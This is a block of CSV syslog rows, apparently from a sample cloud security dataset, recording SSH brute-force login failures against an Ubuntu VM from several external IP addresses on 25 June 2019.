+10086,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:48,UbuntuDevEnv,2019-06-25 22:54:48,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.175 port 53618 ssh2],51391,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,53618,,
+10087,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:48,UbuntuDevEnv,2019-06-25 22:54:48,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,51391,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+10088,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:48,UbuntuDevEnv,2019-06-25 22:54:48,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 53618 ssh2 [preauth],51391,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,53618,,
+10089,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:48,UbuntuDevEnv,2019-06-25 22:54:48,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 53618: Too many authentication failures [preauth],51391,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,53618,,
+10090,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:51,UbuntuDevEnv,2019-06-25 22:54:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,51455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+10091,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:53,UbuntuDevEnv,2019-06-25 22:54:52,auth,UbuntuDevEnv,info,Invalid user www from 178.62.54.79 port 32898,51472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,178.62.54.7,32898,,
+10092,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:53,UbuntuDevEnv,2019-06-25 22:54:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10093,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:53,UbuntuDevEnv,2019-06-25 22:54:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,51472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+10094,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:53,UbuntuDevEnv,2019-06-25 22:54:52,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 65085 ssh2,51455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,65085,,
+10095,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:54,UbuntuDevEnv,2019-06-25 22:54:54,auth,UbuntuDevEnv,info,Failed password for invalid user www from 178.62.54.79 port 32898 ssh2,51472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,178.62.54.7,32898,,
+10096,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:54,UbuntuDevEnv,2019-06-25 22:54:54,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 32898:11: Bye Bye [preauth],51472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,32898,,
+10097,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:54,UbuntuDevEnv,2019-06-25 22:54:54,auth,UbuntuDevEnv,info,Disconnected from invalid user www 178.62.54.79 port 32898 [preauth],51472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,178.62.54.7,32898,,
+10098,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:54:55,UbuntuDevEnv,2019-06-25 22:54:55,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 65085 ssh2,51455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,65085,,
+10099,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:01,UbuntuDevEnv,2019-06-25 22:55:00,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.175 port 65085 ssh2],51455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,65085,,
+10100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:04,UbuntuDevEnv,2019-06-25 22:55:03,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 65085 ssh2,51455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,65085,,
+10101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:07,UbuntuDevEnv,2019-06-25 22:55:07,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 65085 ssh2 [preauth],51455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,65085,,
+10102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:07,UbuntuDevEnv,2019-06-25 22:55:07,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,51455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+10103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:07,UbuntuDevEnv,2019-06-25 22:55:07,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 65085: Too many authentication failures [preauth],51455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,65085,,
+10104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:07,UbuntuDevEnv,2019-06-25 22:55:07,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,51455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+10105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:07,UbuntuDevEnv,2019-06-25 22:55:07,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 65085 ssh2,51455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,65085,,
+10106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:09,UbuntuDevEnv,2019-06-25 22:55:09,auth,UbuntuDevEnv,info,Invalid user kelly from 77.232.128.87 port 55039,51532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kelly,77.232.128.8,55039,,
+10107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:09,UbuntuDevEnv,2019-06-25 22:55:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:09,UbuntuDevEnv,2019-06-25 22:55:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,51532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+10109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:10,UbuntuDevEnv,2019-06-25 22:55:10,auth,UbuntuDevEnv,info,Failed password for invalid user kelly from 77.232.128.87 port 55039 ssh2,51532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kelly,77.232.128.8,55039,,
+10110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:11,UbuntuDevEnv,2019-06-25 22:55:10,auth,UbuntuDevEnv,info,Disconnected from invalid user kelly 77.232.128.87 port 55039 [preauth],51532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kelly,77.232.128.8,55039,,
+10111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:11,UbuntuDevEnv,2019-06-25 22:55:10,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 55039:11: Bye Bye [preauth],51532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,55039,,
+10112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:20,UbuntuDevEnv,2019-06-25 22:55:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,51554,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+10113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:23,UbuntuDevEnv,2019-06-25 22:55:22,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 13456 ssh2,51554,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,13456,,
+10114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:31,UbuntuDevEnv,2019-06-25 22:55:28,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.175 port 13456 ssh2],51554,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,13456,,
+10115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:31,UbuntuDevEnv,2019-06-25 22:55:31,auth,UbuntuDevEnv,info,Invalid user edward from 152.250.252.179 port 37760,51606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edward,152.250.252.1,37760,,
+10116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:31,UbuntuDevEnv,2019-06-25 22:55:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:31,UbuntuDevEnv,2019-06-25 22:55:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,51606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+10118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:33,UbuntuDevEnv,2019-06-25 22:55:33,auth,UbuntuDevEnv,info,Failed password for invalid user edward from 152.250.252.179 port 37760 ssh2,51606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edward,152.250.252.1,37760,,
+10119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:33,UbuntuDevEnv,2019-06-25 22:55:33,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 37760:11: Bye Bye [preauth],51606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,37760,,
+10120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:33,UbuntuDevEnv,2019-06-25 22:55:33,auth,UbuntuDevEnv,info,Disconnected from invalid user edward 152.250.252.179 port 37760 [preauth],51606,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edward,152.250.252.1,37760,,
+10121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:43,UbuntuDevEnv,2019-06-25 22:55:42,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  4 > 3,51554,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+10122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:43,UbuntuDevEnv,2019-06-25 22:55:42,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 13456 ssh2,51554,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,13456,,
+10123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:43,UbuntuDevEnv,2019-06-25 22:55:42,auth,UbuntuDevEnv,info,Received disconnect from 218.92.0.175 port 13456:11:  [preauth],51554,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,13456,,
+10124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:43,UbuntuDevEnv,2019-06-25 22:55:42,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 218.92.0.175 port 13456 [preauth],51554,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,218.92.0.1,13456,,
+10125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:43,UbuntuDevEnv,2019-06-25 22:55:42,authpriv,UbuntuDevEnv,notice,PAM 3 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,51554,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+10126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:48,UbuntuDevEnv,2019-06-25 22:55:48,auth,UbuntuDevEnv,info,Invalid user ftp_user from 139.199.113.140 port 57610,51677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,139.199.113.1,57610,,
+10127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:48,UbuntuDevEnv,2019-06-25 22:55:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:48,UbuntuDevEnv,2019-06-25 22:55:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.113.140,51677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,,0,
+10129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:50,UbuntuDevEnv,2019-06-25 22:55:50,auth,UbuntuDevEnv,info,Received disconnect from 218.92.0.175 port 33899:11:  [preauth],51656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,33899,,
+10130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:50,UbuntuDevEnv,2019-06-25 22:55:50,auth,UbuntuDevEnv,info,Disconnected from 218.92.0.175 port 33899 [preauth],51656,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,33899,,
+10131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:50,UbuntuDevEnv,2019-06-25 22:55:50,auth,UbuntuDevEnv,info,Failed password for invalid user ftp_user from 139.199.113.140 port 57610 ssh2,51677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,139.199.113.1,57610,,
+10132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:50,UbuntuDevEnv,2019-06-25 22:55:50,auth,UbuntuDevEnv,info,Disconnected from invalid user ftp_user 139.199.113.140 port 57610 [preauth],51677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,139.199.113.1,57610,,
+10133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:55:50,UbuntuDevEnv,2019-06-25 22:55:50,auth,UbuntuDevEnv,info,Received disconnect from 139.199.113.140 port 57610:11: Bye Bye [preauth],51677,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.113.1,57610,,
+10134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:56:15,UbuntuDevEnv,2019-06-25 22:56:14,auth,UbuntuDevEnv,info,Invalid user demo from 178.62.54.79 port 49274,51779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,178.62.54.7,49274,,
+10135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:56:15,UbuntuDevEnv,2019-06-25 22:56:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,51779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+10136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:56:15,UbuntuDevEnv,2019-06-25 22:56:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:56:17,UbuntuDevEnv,2019-06-25 22:56:17,auth,UbuntuDevEnv,info,Failed password for invalid user demo from 178.62.54.79 port 49274 ssh2,51779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,178.62.54.7,49274,,
+10138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:56:17,UbuntuDevEnv,2019-06-25 22:56:17,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 49274:11: Bye Bye [preauth],51779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,49274,,
+10139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:56:17,UbuntuDevEnv,2019-06-25 22:56:17,auth,UbuntuDevEnv,info,Disconnected from invalid user demo 178.62.54.79 port 49274 [preauth],51779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,demo,178.62.54.7,49274,,
+10140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:56:39,UbuntuDevEnv,2019-06-25 22:56:39,auth,UbuntuDevEnv,info,Invalid user linker from 77.232.128.87 port 35332,51868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,linker,77.232.128.8,35332,,
+10141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:56:39,UbuntuDevEnv,2019-06-25 22:56:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,51868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:56:39,UbuntuDevEnv,2019-06-25 22:56:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,51868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+10143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:56:41,UbuntuDevEnv,2019-06-25 22:56:40,auth,UbuntuDevEnv,info,Failed password for invalid user linker from 77.232.128.87 port 35332 ssh2,51868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,linker,77.232.128.8,35332,,
+10144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:56:41,UbuntuDevEnv,2019-06-25 22:56:41,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 35332:11: Bye Bye [preauth],51868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,35332,,
+10145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:56:41,UbuntuDevEnv,2019-06-25 22:56:41,auth,UbuntuDevEnv,info,Disconnected from invalid user linker 77.232.128.87 port 35332 [preauth],51868,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,linker,77.232.128.8,35332,,
